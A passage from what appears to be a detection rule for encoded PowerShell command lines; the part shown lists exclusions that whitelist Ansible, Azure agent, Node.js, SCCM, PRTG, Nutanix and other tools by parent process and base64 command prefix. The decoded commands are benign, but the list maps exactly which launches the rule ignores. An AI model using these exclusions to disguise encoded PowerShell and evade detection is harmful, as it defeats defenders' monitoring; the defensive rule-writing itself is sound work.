UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA='\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A'\n\n exclusion_ansible2:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Windows\\System32\\cmd.exe'\n CommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA=='\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA=='\n\n exclusion_ansible3:\n CommandLine|contains:\n - ' -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZ'\n - ' -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdABy'\n\n exclusion_azureconnected:\n ParentImage:\n - '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService\\GC\\gc_worker.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\ExtensionService\\GC\\gc_extension_service.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\ExtensionService2\\GC\\gc_extension_service.exe'\n\n exclusion_nodejs:\n # C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBoAHQAdABwADoALwAvAGwAbwBjAGEAbABoAG8AcwB0ADoAMwAwADAAMAAiAA==\n # ==> Start \"http://localhost:3000\"\n # powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBgACIAaAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA6ADQAMgAwADAALwBgACIAIgA=\n # ==> Start \"`\"http://localhost:4200/`\"\"\n ParentImage|endswith: '\\node.exe'\n CommandLine|contains:\n - 'UwB0AGEAcgB0ACAAIgBoAHQAdABwADoALwAvAGwAbwBjAGEAbABoAG8Ac'\n - 'UwB0AGEAcgB0ACAAIgBgACIAaAB0AHQAcAA6AC8AL'\n\n exclusion_recoveryconsole:\n ParentImage: '?:\\Program Files\\RecoveryConsole\\RecoveryConsole.exe'\n CommandLine: 'powershell.exe -EncodedCommand aQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAzACkAIAB7ACAAZQB4AGkAdAAgADIANwAgAH0AJABtAG8AZAB1AGwAZQA9AEcAZQB0AC0ATQBvAGQAdQBsAGUAIAAtAEwAaQBzAHQAQQB2AGEAaQBsAGEAYgBsAGUAIABBAFcAUwBQAG8AdwBlAHIAUwBoAGUAbABsADsAIABpAGYAKAAkAG0AbwBkAHUAbABlACkAIAB7ACAAIAAgAGkAZgAoACQAbQBvAGQAdQBsAGUALgBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAzACkAIAB7ACAAZQB4AGkAdAAgADIANgAgAH0AOwAgACAAIABlAHgAaQB0ACAAMAAgAH0AIABlAGwAcwBlACAAewAgAGUAeABpAHQAIAAxADEAIAB9ADsA'\n\n exclusion_centreon:\n # https://github.com/centreon/centreon-plugins/blob/master/centreon/common/powershell/windows/pendingreboot.pm\n ParentCommandLine|contains|all:\n - '/centreon_plugins.exe '\n - ' --plugin'\n GrandparentImage|endswith: '\\centreon_plugins.exe'\n\n exclusion_applocker:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand cABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBzAHcAaQB0AGMAaABdACAAJABDAGgA ZQBjAGsAQwBvAG0AcABsAGkAYQBuAGMAZQBPAG4AbAB5ACAAPQAgACQAZgBhAGwA cwBlAAoACQApAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBuAHQAMwAyAF0AJABwAG8A '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5ACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkA XQBbAHMAdAByAGkAbgBnAF0AIAAkAEkAbgBwAHUAdABYAG0AbAAsAAoAIAAgACAA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5ACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkA XQBbAHMAdAByAGkAbgBnAF0AIAAkAEQAZQB2AEcAdQBhAHIAZABQAGEAdABoACwA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQA aQBvAG4APQAwACkAXQBbAHMAdAByAGkAbgBnAF0AIAAkAEMAYwBtAEUAeABlAGMA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBzAHcAaQB0AGMAaABdACAA JABDAGgAZQBjAGsAQwBvAG0AcABsAGkAYQBuAGMAZQBPAG4AbAB5ACAAPQAgACQA ZgBhAGwAcwBlAAoACQApAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBuAHQAMwAyAF0A '\n ParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_prtg:\n CommandLine|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -encodedCommand DQAKACAAIAAgACAAJABpAHMARABlAGIAdQBnAE0AbwBkAGUAIAA9ACAAJABmAGEAbABzAGUAOwANAAoAIAAgACAAIAAkAHQAbQBwAFIAZQBzAHUAbAB0AEYAaQBsAGUAIAA9ACAAJwBjADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABQAFIAVABHAFcAaQBuAFUAcABkAGEAdABlAFIAZQBzAHUAbAB0AC4AdAB4AHQAJwANAAoAIAAgACAAIAAkAHQAYQBzAGsATABvAGcAUABhAHQAaAAgAD0AIAAnAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAUgBUAEcAVwBpAG4AVQBwAGQAYQB0AGUAXwBEAEUAQgBVAEcAXwBTAGMAaABlAGQAdQBsAGUAZABTAGMAcgBpAHAAdAAuAHQAeAB0ACcADQAKAA0ACgAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAGwAbwBnAEQAZQBiAHUAZwAgAHsADQAKACAAIAAgACAAIAAgACAAIABQAGEAcgBhAG0AKAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5ACAAPQAgACQAdAByAHUAZQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAGUAcwBzAGEAZwBlAA0ACgAgACAAIAAgACAAIAAgACAAKQANAAoA'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\LANDesk\\LDClient\\sdistps1.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistps1.exe'\n GrandparentImage:\n - '?:\\Program Files\\LANDesk\\LDClient\\SDCLIENT.EXE'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\SDCLIENT.EXE'\n\n exclusion_microsoft_cloud_agent:\n ParentImage: '?:\\Program Files\\Microsoft Cloud Managed Desktop Extension\\CMDExtension\\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_polylens:\n CommandLine|startswith: '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBgACIAQwA6AFwAVQBzAGUAcgBzAFwA'\n ParentImage|endswith: '\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n GrandparentImage|endswith: '\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_waptpython:\n GrandparentImage|endswith:\n - '\\waptpython.exe'\n - '\\waptpythonw.exe'\n GrandparentCommandLine|contains:\n - 'waptservice\\service.py'\n - '\\wapt\\wapt-get.py session-setup'\n CommandLine|startswith: 'powershell -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -OutputFormat text -EncodedCommand '\n\n exclusion_waptget:\n GrandparentImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\wapt\\wapt-get.exe'\n CommandLine|startswith: '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -OutputFormat text -EncodedCommand '\n\n exclusion_nutanix:\n - ParentImage: '?:\\Program Files\\Nutanix\\Python3?\\python.exe'\n GrandparentImage: '?:\\Program Files\\Nutanix\\Python3?\\Lib\\site-packages\\win32\\pythonservice.exe'\n - ParentImage: '?:\\Program Files\\Nutanix\\Python3?\\Lib\\site-packages\\win32\\pythonservice.exe'\n CommandLine:\n - 'powershell.exe -NoProfile -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAdwBtAGkAIAAtAEMAbABhAHMAcwAgAE0AUwBpAFMAQwBTAEkASQBuAGkAdABpAGEAdABvAHIAXwBTAGUAbgBkAFQAYQByAGcAZQB0AFAAbwByAHQAYQBsAEMAbABhAHMAcwAgAHwAIABGAG8AcgBlAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAFAAbwByAHQAYQBsAEEAZABkAHIAZQBzAHMAIAB9AA=='\n - 'powershell.exe -NoProfile -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAdwBtAGkAIAAtAEMAbABhAHMAcwAgAE0AUwBpAFMAQwBTAEkASQBuAGkAdABpAGEAdABvAHIAXwBNAGUAdABoAG8AZABDAGwAYQBzAHMAKQAuAGkAUwBDAFMASQBOAG8AZABlAE4AYQBtAGUA'\n - ProcessParentImage|endswith: '\\nutanix\\move\\\\*\\move-service.exe'\n\n exclusion_rgsupervision:\n GrandparentImage: '?:\\Program Files (x86)\\RG-Supervision\\RG_Supervision.exe'\n\n exclusion_dbeaver:\n GrandparentImage:\n - '?:\\Program Files\\DBeaver\\dbeaver.exe'\n - '?:\\Program Files (x86)\\DBeaver\\dbeaver.exe'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n # ServiceNav and Ansible\n exclusion_winrshost:\n ProcessParentCommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /C powershell -encodedcommand '\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -EncodedCommand '\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n ProcessAncestors: 